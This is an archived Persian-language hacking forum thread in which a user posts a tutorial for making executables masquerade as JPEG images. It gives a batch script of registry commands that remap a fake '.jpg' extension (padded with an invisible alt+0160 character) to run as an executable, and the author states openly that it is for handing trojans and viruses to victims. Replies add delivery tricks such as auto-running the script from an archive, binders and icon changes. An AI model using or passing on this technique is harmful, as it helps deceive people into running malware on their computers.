Train

PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : فایل اجرایی با فرمت عکس jpg !

TΣst
04-07-2011, 04:45 PM
سلام
حتما میدونید که تا به حال یک فایل اجرایی که فرمت jpg داشته باشه وجود نداشته .
در این آموزش با نحوه ایجاد یک فایل اجرایی با فرمت جعلی jpg آشنا میشید.
در این روش با ایجاد یک سری تغییرات کوچک در رجیستری فایل jpg اجرایی ایجاد میکنیم. و میتوان تروجان و ویروس خود را به این صورت به قربانی داد.
محتوای اصلی آموزش برگرفته از یک سایت خارجی است به جز روش به کار برده شده.
خب بریم سراغ آموزش.
ابتدا اسکریپت زیر را در notepad وارد کرده و آن را با فرمت bat. ذخیره کنید:@echo off
reg add "HKCR\.jpg " /ve /d exefile /f
reg add "HKCR\.jpg " /v "Content Type" /d "application/x-msdownload" /f
reg add "HKCR\.jpg \PeistenHandler" /ve /d "{098f2470-bae0-11cd-b579-08002b30bfeb}" /f
در واقع ما ویژگی های فایل اجرایی به فرمت exe. رو شبیه سازی میکنیم به فرمت jpg.
و نکته ای که باید بهش توجه داشته باشیم این هست که این فرمت یعنی jpg جعلی با فرمت اصلی عکس و تصویر یک فرق داره و اون این که در اخر این فرمت جعلی یک فاصله و کاراکتر خالی با استفاده از کلید ترکیبی alt + 0160 قرار میدیم.
سپس این فایل نیاز به اجرا شدن در سیستم قربانی دارد تا تغییرات مورد نظر رو در سیستم ایجاد کنه.
بعد از اجرا شدن این فایل و ایجاد تغییرات تروجان یا هر فایل اجرایی دیگر خود را که در دست دارید فرمتش رو از .exe به فرمت جعلی ایجاد شده یعنی .jpg(alt+0160) تغییر بدید.
نکته: برای ترکیب عکس با فایل اجرایی میتونید از winrar یا ابزارهای بایندر دیگر استفاده کنید.
امیدوارم مورد قبول واقع شده باشه.

r_22009
04-07-2011, 05:03 PM
یه نکته هم هست که 0160 رو باید از داخل Num pad وارد کنید تا کاراکتر خالی بیاد

daniel4u
04-07-2011, 05:11 PM
بیشترشو نفهمیدم
منتظر ویدئو آموزشی میشم
shayan6728
04-08-2011, 11:31 AM
سلام من قبلا شنیده بودم که میشه هر نوع فایلی رو با یه سری دستور cmdبه jpg تبدیل کرد و دوباره به حالت اول برگردوند.اما دستوراتش رو گم کردم .می شه کمکم کنید؟

Majid-system
05-15-2011, 12:58 PM
AsLan Khudet be matni ke neveshti negah kun bebin mituni befahmi
ma ke nafahmidim chi shud:-??:92:

ict2153
06-03-2011, 07:45 PM
خیلی بد توضیح دادی بالاخره

err2000
06-04-2011, 05:35 PM
این که توضیح نمی خواد
کدها رو بریز تو txt و بعد با فرمت bat ذخیره کن بعد نام فایل Exe هم به filename.alt+0160jpg تغییر بده بعد هر دو رو بفرست به طرف وقتی فایل محتوای bat رو کلیک کرد یه تغییراتی تو ریجیستری ایجاد می شه که فایل exe شما رو به صورت . jpg در میاره همین
ولی از نظر منطقی بخوای حساب کنی خوب وقتی اون گول میخوره که .bat رو کلیک کنی دگه فلسفه ی این کار چه هست رو من نمی دونم

TΣst
08-18-2011, 12:53 AM
ولی از نظر منطقی بخوای حساب کنی خوب وقتی اون گول میخوره که .bat رو کلیک کنی دگه فلسفه ی این کار چه هست رو من نمی دونم

نیازی نیست هدف روی فایل بچ اسکریپ کلیک کنه میتونید فایل بچ رو داخل یه فایل فشرده شده قرار بدید همراه فایل های دیگه و موقع بیرون کشیدن فایل ها از حالت فشرده این فایل خود به خود اجرا بشه.(یک مثال)
و این روش الزاما به این معنی نیست که بیاید از این روش استفاده کنید بلکه یکی از راهها هست که میتونه مفید باشه.
:36:

MostafaBestMan
08-18-2011, 01:07 PM
سلام.نمونه برنامه ساخته شده با استفاده از روشهای مشابه + تغییر آیکن فایل اجرایی
در اینجا ([Only registered and activated users can see links])